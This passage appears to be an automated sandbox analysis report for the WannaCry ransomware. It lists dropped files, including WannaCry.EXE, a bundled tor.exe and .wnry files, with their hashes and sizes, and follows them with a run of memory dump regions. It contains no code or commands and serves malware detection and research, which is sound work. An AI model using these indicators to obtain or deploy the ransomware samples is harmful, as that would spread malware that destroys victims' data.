2470fcc7cde3155638aeb122cd098e2a

SHA1
d1faddd0a00b25d28b916c188607aa7b2c7f4a1e

SHA256
fdc5933e2d231d21ac8004201710a3daab7bbb48615d57b2c396e3f2944e7f33

SHA512
3483cd7f8815a0fd774b05f3d037cf7a6498afb0de7289b672ab6ce12f6c43b5fae6d65c6dbaffbc80ea8e6d50fa198f9eb5cdbd0a8c04bea9b66455a9121640

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
10.7MB

MD5
46f69707c8639853430072b7fa09833e

SHA1
4d5127dcc8a380c431fc4320a8f878e6c0211f41

SHA256
5c10cccd9f700c1da985cd56710b3af574ff70d9a889a7e716e3ec6d0c5a6a0b

SHA512
dafb515cff1b430efb36a21e57d30735cce1463c846178148edacfe773ac9408c53f9b0d5aca83038ff0c37f7045ab3b5abe22cd0646549c490cfa943fd69576

Download Submit
C:\Users\Admin\Downloads\@[email protected]

Filesize
933B

MD5
7e6b6da7c61fcb66f3f30166871def5b

SHA1
00f699cf9bbc0308f6e101283eca15a7c566d4f9

SHA256
4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e

SHA512
e5a56137f325904e0c7de1d0df38745f733652214f0cdb6ef173fa0743a334f95bed274df79469e270c9208e6bdc2e6251ef0cdd81af20fa1897929663e2c7d3

Download Submit
C:\Users\Admin\Downloads\@[email protected]

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\Downloads\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\Downloads\WannaCry.EXE

Filesize
3.4MB

MD5
84c82835a5d21bbcf75a61706d8ab549

SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Download Submit
C:\Users\Admin\Downloads\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Default\Desktop\@[email protected]

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
memory/1196-1000-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/1196-2512-0x0000000000400000-0x000000000075A000-memory.dmp

Filesize
3.4MB

Download
memory/3092-2461-0x0000000073CD0000-0x0000000073CF2000-memory.dmp

Filesize
136KB

Download
memory/3092-2593-0x0000000073A30000-0x0000000073C4C000-memory.dmp

Filesize
2.1MB

Download
memory/3092-2458-0x0000000073D90000-0x0000000073E12000-memory.dmp

Filesize
520KB

Download
memory/3092-2462-0x0000000000BD0000-0x0000000000ECE000-memory.dmp

Filesize
3.0MB

Download
memory/3092-2460-0x0000000073D00000-0x0000000073D82000-memory.dmp

Filesize
520KB

Download
memory/3092-2778-0x0000000000BD0000-0x0000000000ECE000-memory.dmp

Filesize
3.0MB

Download
memory/3092-2513-0x0000000000BD0000-0x0000000000ECE000-memory.dmp

Filesize
3.0MB

Download
memory/3092-2519-0x0000000073A30000-0x0000000073C4C000-memory.dmp

Filesize
2.1MB

Download
memory/3092-2518-0x0000000073C50000-0x0000000073CC7000-memory.dmp

Filesize
476KB

Download
memory/3092-2517-0x0000000073D00000-0x0000000073D82000-memory.dmp

Filesize
520KB

Download
memory/3092-2516-0x0000000073CD0000-0x0000000073CF2000-memory.dmp

Filesize
136KB

Download
memory/3092-2515-0x0000000074760000-0x000000007477C000-memory.dmp

Filesize
112KB

Download
memory/3092-2514-0x0000000073D90000-0x0000000073E12000-memory.dmp

Filesize
520KB

Download
memory/3092-2459-0x0000000073A30000-0x0000000073C4C000-memory.dmp

Filesize
2.1MB

Download
memory/3092-2542-0x0000000000BD0000-0x0000000000ECE000-memory.dmp

Filesize
3.0MB

Download
memory/3092-2587-0x0000000000BD0000-0x0000000000ECE000-memory.dmp

Filesize
3.0MB

Download
memory/3092-2555-0x0000000000BD0000-0x0000000000ECE000-memory.dmp

Filesize
3.0MB

Download
memory/4812-549-0x00007FF925DB0000-0x00007FF925DC0000-memory.dmp

Filesize
64KB

Download
memory/4812-548-0x00007FF925DB0000-0x00007FF925DC0000-memory.dmp

Filesize
64KB

Download
memory/4812-551-0x00007FF925DB0000-0x00007FF925DC0000-memory.dmp

Filesize
64KB

Download
memory/4812-528-0x00007FF923760000-0x00007FF923770000-memory.dmp

Filesize
64KB

Download
memory/4812-527-0x00007FF923760000-0x00007FF923770000-memory.dmp

Filesize
64KB

Download
memory/4812-525-0x00007FF925DB0000-0x00007FF925DC0000-memory.dmp

Filesize
64KB

Download
memory/4812-526-0x00007FF925DB0000-0x00007FF925DC0000-memory.dmp

Filesize
64KB

Download
memory/4812-523-0x00007FF925DB0000-0x00007FF925DC0000-memory.dmp

Filesize
64KB

Download
memory/4812-524-0x00007FF925DB0000-0x00007FF925DC0000-memory.dmp

Filesize
64KB

Download
memory/4812-522-0x00007FF925DB0000-0x00007FF925DC0000-memory.dmp

Filesize
64KB

Download
memory/4812-550-0x00007FF925DB0000-0x00007FF925DC0000-memory.dmp

Filesize
64KB

Download